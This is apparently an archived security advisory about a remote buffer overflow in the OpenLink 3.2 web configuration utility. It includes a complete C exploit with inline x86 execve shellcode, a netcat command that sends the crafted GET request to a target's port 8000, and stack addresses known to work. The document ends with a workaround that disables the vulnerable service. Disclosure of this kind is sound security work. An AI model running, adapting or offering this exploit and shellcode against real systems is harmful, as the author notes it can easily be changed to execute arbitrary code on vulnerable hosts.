COMMAND

    openlink

SYSTEMS AFFECTED

    OpenLink 3.2

PROBLEM

    Tymm Twillman found following.   A serious security hole has  been
    found in the  web configuration utility  that comes with  OpenLink
    3.2.  This hole will allow remote users to execute arbitrary  code
    as the user id under which the web configurator is run  (inherited
    from the request broker, oplrqb).   The hole is a  run-of-the-mill
    buffer overflow, due to  lack of parameter checking  when strcpy()
    is used.

    OpenLink  is  a  database  request  broker,  used  for  a  generic
    interface to different database vendors' products.  By default,  a
    web configuration utility is  installed, which runs at  port 8000.
    For more information, see OpenLink Software's web site at

        http://www.openlinksw.com

    This  exploit  has  been  coded  to  be  benign,  and  is just for
    illustration   of   the   hole   in   the  configuration  utility.
    Furthermore, it has  not been coded  for portability (no  promises
    that  it  will  function  if  compiled  with  anything  other than
    egcs-2.91.66,  and  it  will  not  compile on a non-x86 compiler).
    This  works  against  the  linux  glibc  version of OpenLink 3.2's
    configurator.   It  can  easily  be  modified  for other purposes,
    however, and there  are reasons to  believe that the  majority, if
    not all, platforms are vulnerable to such an attack.

    A stack  address may  be specified  on the  command line (Tymm had
    luck with 0xbffffb65, 0xbffffb85  or 0xbffffbe5).  Output  of this
    should be piped through netcat, e.g.

        ./oplwall 0xbffffb85 | nc machine.to.hit 8000

    The code:

    #include <stdio.h>
    #include <unistd.h>

    /*
     * Exploit for Openlink's web configurator for Linux/glibc2
     *  use: pipe through netcat to openlink web port (8000 default)
     *  ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
     *  makes www_sv execute /usr/bin/wall if you hit the address right
     *
     * For informational purposes only.  This was written to show that
     *  there's a problem, not for skr1pt k1dd33z --.
     *  don't ask me for help on how to use this to crack systems,
     *  help compiling or anything else.  It will only compile on
     *  an x86 compiler however.
     *
     * Addresses that work for me: 0xbffffb65 (initial run of the broker)
     *                             0xbffffb85 (all consecutive attempts)
     *                             probably tied to process ID www_sv runs as;
     *                             first try PIDs were in triple digits, others
     *                             4 digit PIDs.
     *
     * If this works, generally no more www_sv processes will be run as a side effect.
     */

    void test() {

    __asm__("

	    jmp    doit
    exploit:

	    # code basically from Aleph One's smash stacking article, with
            #  minor mods

	    popl  %esi
	    movb  $0xd0, %al            # Get a / character into %al
	    xorb  $0xff, %al
	    movb  %al, 0x1(%esi)        # drop /s into place
	    movb  %al, 0x5(%esi)
	    movb  %al, 0x9(%esi)
            xorl  %eax,%eax             # clear %eax
            movb  %eax,0xe(%esi)        # drop a 0 at end of string
            movl  %eax,0x13(%esi)       # drop NULL for environment
            leal  0x13(%esi),%edx       # point %edx to environment
            movl  %esi,0xf(%esi)        # drop pointer to argv
            leal  0xf(%esi),%ecx        # point %ecx to argv
            movl  %esi,%ebx             # point ebx to command - 1
	    inc   %ebx                  # fix it to point to the right place
            movb  $0xb,%al              # index to execve syscall
            int   $0x80                 # execute it
            xorl  %ebx,%ebx            #  if exec failed, exit nicely...
            movl  %ebx,%eax
            inc   %eax
            int   $0x80
    doit:
	    call exploit
            .string \"..usr.bin.wall.\"
    ");

    }

    char *shellcode = ((char *)test) + 3;

    char code[1000];

    int main(int argc, char *argv[])

    {
	    int i;
	    int left;
	    unsigned char where[] = {"\0\0\0\0\0"} ;
            int *here;
	    char *dummy;
	    long addr;


	    if (argc > 1)
		    addr = strtoul(argv[1], &dummy, 0);
	    else
		    addr = 0xbffffb85;

	    fprintf(stderr, "Setting address to %8x\n", addr);

	    *((long *)where) = addr;

	    strcpy(code, shellcode);

	    for (i = 0; i < 64; i++) {
		    strcat(code, where);
	    }

	    printf("GET %s\n", code);

	    exit(0);

    }

    The NT version is vulnerable to a boundary condition as well.

SOLUTION

    OpenLink  software  has  been  notified  of  the  problem  is   is
    apparently  working  on  a  solution.   As  for  workaround,   use
    following.   Disable  the  www_sv  application  in oplrqb.ini.  By
    default there is a  section labeled Persistent Services,  with the
    line  "Configurator  =  www_sv".   This  section,  along  with the
    entire www_sv  section, should  be commented  out with semicolons,
    e.g.

        ;[Persistent Services]
        ;Configurator = www_sv

        ;[www_sv]
        ;Program     = w3config/www_sv
        ;Directory   = w3config
        ;CommandLine =
        ;Environment = WWW_SV

        ;[Environment WWW_SV]

    Apparently to complicate issues, OpenLink Software has released  a
    new "version"  of their  product, but  hasn't updated  the version
    number.  There  is also, as  far as I  can tell, nothing  on their
    website informing users  of this change.   Even the filenames  are
    the same; there are numerous changes however.